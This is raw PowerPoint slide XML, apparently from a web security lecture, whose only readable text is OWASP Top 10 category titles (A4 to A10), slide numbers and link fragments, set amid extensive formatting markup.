          <a:endParaRPr kumimoji="0" lang="en-US" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4551085" y="3022"/>
        <a:ext cx="1930654" cy="1158392"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C3E7A39C-1CAB-4280-9674-550D9EBD3664}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6677952" y="0"/>
          <a:ext cx="1930654" cy="1158392"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="12700" dir="5400000" algn="ctr" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="50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kumimoji="0" lang="en-US" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A4: </a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>Insecure Direct Object References </a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6677952" y="0"/>
        <a:ext cx="1930654" cy="1158392"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E75F8F30-3FA0-429A-A777-BC11F620C600}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="306793" y="1352070"/>
          <a:ext cx="1930654" cy="1158392"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="12700" dir="5400000" algn="ctr" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="50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kumimoji="0" lang="en-US" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A5: </a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>Cross Site Request Forgery (CSRF) </a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="306793" y="1352070"/>
        <a:ext cx="1930654" cy="1158392"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{764C6158-AD60-4271-9C65-2ABDF85CAA50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2430513" y="1352070"/>
          <a:ext cx="1930654" cy="1158392"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="FF0000"/>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="12700" dir="5400000" algn="ctr" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="50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t>A6: Security </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" b="1" kern="1200" dirty="0" err="1"/>
            <a:t>Misconfiguration</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2430513" y="1352070"/>
        <a:ext cx="1930654" cy="1158392"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EA75EA57-6CCA-4563-87BD-023630ABCFA8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4554232" y="1352070"/>
          <a:ext cx="1930654" cy="1158392"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill flip="none" rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="0066CC">
                <a:shade val="30000"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="0066CC">
                <a:shade val="67500"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0066CC">
                <a:shade val="100000"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="12700" dir="5400000" algn="ctr" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="50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t>A7: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ja-JP" sz="1900" b="1" kern="1200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>Failure to Restrict URL Access</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4554232" y="1352070"/>
        <a:ext cx="1930654" cy="1158392"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{41C906C3-FECE-4AA6-9B2E-E742275892E7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6677952" y="1352070"/>
          <a:ext cx="1930654" cy="1158392"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill flip="none" rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="0066CC">
                <a:shade val="30000"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="0066CC">
                <a:shade val="67500"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0066CC">
                <a:shade val="100000"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="12700" dir="5400000" algn="ctr" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="50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t>A8: Insecure Cryptographic Storage</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6677952" y="1352070"/>
        <a:ext cx="1930654" cy="1158392"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0E5BD108-059F-48AE-801C-18529182DE42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2430513" y="2703528"/>
          <a:ext cx="1930654" cy="1158392"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill flip="none" rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="0066CC">
                <a:shade val="30000"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="0066CC">
                <a:shade val="67500"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0066CC">
                <a:shade val="100000"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="12700" dir="5400000" algn="ctr" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="50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altLang="ja-JP" sz="1900" b="1" kern="1200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>A9: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" b="1" i="0" u="none" kern="1200" dirty="0"/>
            <a:t>Insufficient Transport Layer Protection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2430513" y="2703528"/>
        <a:ext cx="1930654" cy="1158392"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AB8EC8CA-2DD9-43B0-BAC8-DBF5D6A86196}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4554232" y="2703528"/>
          <a:ext cx="1930654" cy="1158392"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="FF0000"/>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="12700" dir="5400000" algn="ctr" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="50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t>A10: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ja-JP" sz="1900" b="1" kern="1200" dirty="0" err="1">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>Unvalidated</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ja-JP" sz="1900" b="1" kern="1200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t> Redirects and Forwards</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4554232" y="2703528"/>
        <a:ext cx="1930654" cy="1158392"/>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8/23/2023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11251330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8/23/2023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209741526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Code_injection"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en.wikipedia.org/wiki/Client-side_scrip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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1165537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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1568688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b-NO" altLang="nb-NO"/>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000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{BCB7A5A8-865B-4CE7-8C88-5C572D5315D8}" type="slidenum">
              <a:rPr lang="en-US" altLang="nb-NO" sz="1300">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="1300">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2796790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b-NO" altLang="nb-NO"/>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000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{BCB7A5A8-865B-4CE7-8C88-5C572D5315D8}" type="slidenum">
              <a:rPr lang="en-US" altLang="nb-NO" sz="1300">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="1300">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4265481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b-NO" altLang="nb-NO"/>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000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1FB023D8-4C7F-466D-A4CE-B9AA018ABFD1}" type="slidenum">
              <a:rPr lang="en-US" altLang="nb-NO" sz="1300">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="1300">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2623925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b-NO" altLang="nb-NO"/>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000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="965200" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="965200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
